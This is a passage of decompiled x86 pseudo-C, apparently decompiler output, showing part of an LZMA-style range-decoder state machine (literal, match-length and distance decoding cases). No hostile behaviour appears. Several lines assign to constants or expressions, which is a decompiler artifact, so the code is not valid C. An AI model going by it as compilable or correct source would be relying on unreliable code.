                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                  											if( *(_t612 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t531 =  *_t605;
                                                  											_t588 = _t531 & 0x0000ffff;
                                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                  											if( *(_t612 - 0xc) >= _t564) {
                                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                  												 *(_t612 - 0x40) = 1;
                                                  												_t532 = _t531 - (_t531 >> 5);
                                                  												__eflags = _t532;
                                                  												 *_t605 = _t532;
                                                  											} else {
                                                  												 *(_t612 - 0x10) = _t564;
                                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                  											}
                                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											} else {
                                                  												goto L137;
                                                  											}
                                                  										case 5:
                                                  											L137:
                                                  											if( *(_t612 - 0x6c) == 0) {
                                                  												 *(_t612 - 0x88) = 5;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                  											L139:
                                                  											_t533 =  *(_t612 - 0x84);
                                                  											goto L140;
                                                  										case 6:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											goto L132;
                                                  										case 8:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xa;
                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x38);
                                                  												__ecx =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                  												 *(__ebp - 0x84) = 9;
                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  											}
                                                  											goto L132;
                                                  										case 9:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L90;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t259;
                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  											goto L76;
                                                  										case 0xa:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xb;
                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											__eax =  *(__ebp - 0x28);
                                                  											goto L89;
                                                  										case 0xb:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__ecx =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x20);
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x24);
                                                  											}
                                                  											__ecx =  *(__ebp - 0x28);
                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  											L89:
                                                  											__ecx =  *(__ebp - 0x2c);
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  											L90:
                                                  											__eax =  *(__ebp - 4);
                                                  											 *(__ebp - 0x80) = 0x15;
                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  											goto L69;
                                                  										case 0xc:
                                                  											L100:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xc;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t335 = __ebp - 0x70;
                                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t335;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											goto L102;
                                                  										case 0xd:
                                                  											L37:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xd;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t122 = __ebp - 0x70;
                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t122;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L39:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  												goto L48;
                                                  											}
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												goto L54;
                                                  											}
                                                  											L41:
                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  											 *(__ebp - 0x48) = __eax;
                                                  											__eax = __eax + 1;
                                                  											__eax = __eax << 8;
                                                  											__eax = __eax + __ebx;
                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edx = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												 *(__ebp - 0x40) = 1;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												__ebx = __ebx + __ebx + 1;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edx;
                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L39;
                                                  											} else {
                                                  												goto L37;
                                                  											}
                                                  										case 0xe:
                                                  											L46:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t156 = __ebp - 0x70;
                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t156;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											while(1) {
                                                  												L48:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t170 = __edx + 1; // 0x1
                                                  													__ebx = _t170;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													continue;
                                                  												} else {
                                                  													goto L46;
                                                  												}
                                                  											}
                                                  											L54:
                                                  											_t173 = __ebp - 0x34;
                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  											__eflags =  *_t173;
                                                  											goto L55;
                                                  										case 0xf:
                                                  											L58:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xf;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t203 = __ebp - 0x70;
                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t203;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L60:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												L55:
                                                  												__al =  *(__ebp - 0x44);
                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  												goto L56;
                                                  											}
                                                  											L61:
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__edx = __ebx + __ebx;
                                                  											__ecx =  *(__ebp - 0x10);
                                                  											__esi = __edx + __eax;
                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												_t217 = __edx + 1; // 0x1
                                                  												__ebx = _t217;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L60;
                                                  											} else {
                                                  												goto L58;
                                                  											}
                                                  										case 0x10:
                                                  											L110:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x10;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t366 = __ebp - 0x70;
                                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t366;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											goto L112;
                                                  										case 0x11:
                                                  											L69:
                                                  											__esi =  *(__ebp - 0x58);
                                                  											 *(__ebp - 0x84) = 0x12;
                                                  											L132:
                                                  											 *(_t612 - 0x54) = _t605;
                                                  											goto L133;
                                                  										case 0x12:
                                                  											goto L0;
                                                  										case 0x13:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												_t469 = __ebp - 0x58;
                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  												__eflags =  *_t469;
                                                  												 *(__ebp - 0x30) = 0x10;
                                                  												 *(__ebp - 0x40) = 8;
                                                  												goto L144;
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											 *(__ebp - 0x30) = 8;
                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  											goto L130;
                                                  										case 0x14:
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  											__eax =  *(__ebp - 0x80);
                                                  											L140:
                                                  											 *(_t612 - 0x88) = _t533;
                                                  											goto L1;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  											__al = __al & 0x000000fd;
                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  											goto L121;
                                                  										case 0x16:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__eflags = __eax - 4;
                                                  											if(__eax >= 4) {
                                                  												_push(3);
                                                  												_pop(__eax);
                                                  											}
                                                  											__ecx =  *(__ebp - 4);
                                                  											 *(__ebp - 0x40) = 6;
                                                  											__eax = __eax << 7;
                                                  											 *(__ebp - 0x7c) = 0x19;
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											goto L145;
                                                  										case 0x17:
                                                  											goto L145;
                                                  										case 0x18:
                                                  											L146:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x18;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t484 = __ebp - 0x70;
                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t484;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L148:
                                                  											_t487 = __ebp - 0x48;
                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                  											__eflags =  *_t487;
                                                  											goto L149;
                                                  										case 0x19:
                                                  											__eflags = __ebx - 4;
                                                  											if(__ebx < 4) {
                                                  												 *(__ebp - 0x2c) = __ebx;
                                                  												L120:
                                                  												_t394 = __ebp - 0x2c;
                                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                  												__eflags =  *_t394;
                                                  												L121:
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  													goto L170;
                                                  												}
                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                  													goto L171;
                                                  												}
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  												__eax =  *(__ebp - 0x30);
                                                  												_t401 = __ebp - 0x60;
                                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  												__eflags =  *_t401;
                                                  												goto L124;
                                                  											}
                                                  											__ecx = __ebx;
                                                  											__eax = __ebx;
                                                  											__ecx = __ebx >> 1;
                                                  											__eax = __ebx & 0x00000001;
                                                  											__ecx = (__ebx >> 1) - 1;
                                                  											__al = __al | 0x00000002;
                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                  											__eflags = __ebx - 0xe;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ebx >= 0xe) {
                                                  												__ebx = 0;
                                                  												 *(__ebp - 0x48) = __ecx;
                                                  												L103:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__eax = __eax + __ebx;
                                                  													 *(__ebp - 0x40) = 4;
                                                  													 *(__ebp - 0x2c) = __eax;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                  													__eflags = __eax;
                                                  													L109:
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													 *(__ebp - 0x50) = 1;
                                                  													 *(__ebp - 0x44) = 0;
                                                  													 *(__ebp - 0x48) = 0;
                                                  													L113:
                                                  													__eax =  *(__ebp - 0x40);
                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  														_t392 = __ebp - 0x2c;
                                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                  														__eflags =  *_t392;
                                                  														goto L120;
                                                  													}
                                                  													__eax =  *(__ebp - 0x50);
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__esi = __edi + __eax;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__ax =  *__esi;
                                                  													__ecx = __ax & 0x0000ffff;
                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                  														__ecx = 0;
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  														__ecx = 1;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  														__ebx = 1;
                                                  														__ecx =  *(__ebp - 0x48);
                                                  														__ebx = 1 << __cl;
                                                  														__ecx = 1 << __cl;
                                                  														__ebx =  *(__ebp - 0x44);
                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                  														__cx = __ax;
                                                  														__cx = __ax >> 5;
                                                  														__eax = __eax - __ecx;
                                                  														__edi = __edi + 1;
                                                  														__eflags = __edi;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  														 *__esi = __ax;
                                                  														 *(__ebp - 0x50) = __edi;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __edx;
                                                  														0x800 = 0x800 - __ecx;
                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  														 *__esi = __dx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L112:
                                                  														_t369 = __ebp - 0x48;
                                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                                  														__eflags =  *_t369;
                                                  														goto L113;
                                                  													} else {
                                                  														goto L110;
                                                  													}
                                                  												}
                                                  												__ecx =  *(__ebp - 0xc);
                                                  												__ebx = __ebx + __ebx;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													__ebx = __ebx | 0x00000001;
                                                  													__eflags = __ebx;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													L102:
                                                  													_t339 = __ebp - 0x48;
                                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                                  													__eflags =  *_t339;
                                                  													goto L103;
                                                  												} else {
                                                  													goto L100;
                                                  												}
                                                  											}
                                                  											__edx =  *(__ebp - 4);
                                                  											__eax = __eax - __ebx;
                                                  											 *(__ebp - 0x40) = __ecx;
                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  											goto L109;
                                                  										case 0x1a:
                                                  											L56:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1a;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x68);
                                                  											__al =  *(__ebp - 0x5c);
                                                  											__edx =  *(__ebp - 8);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
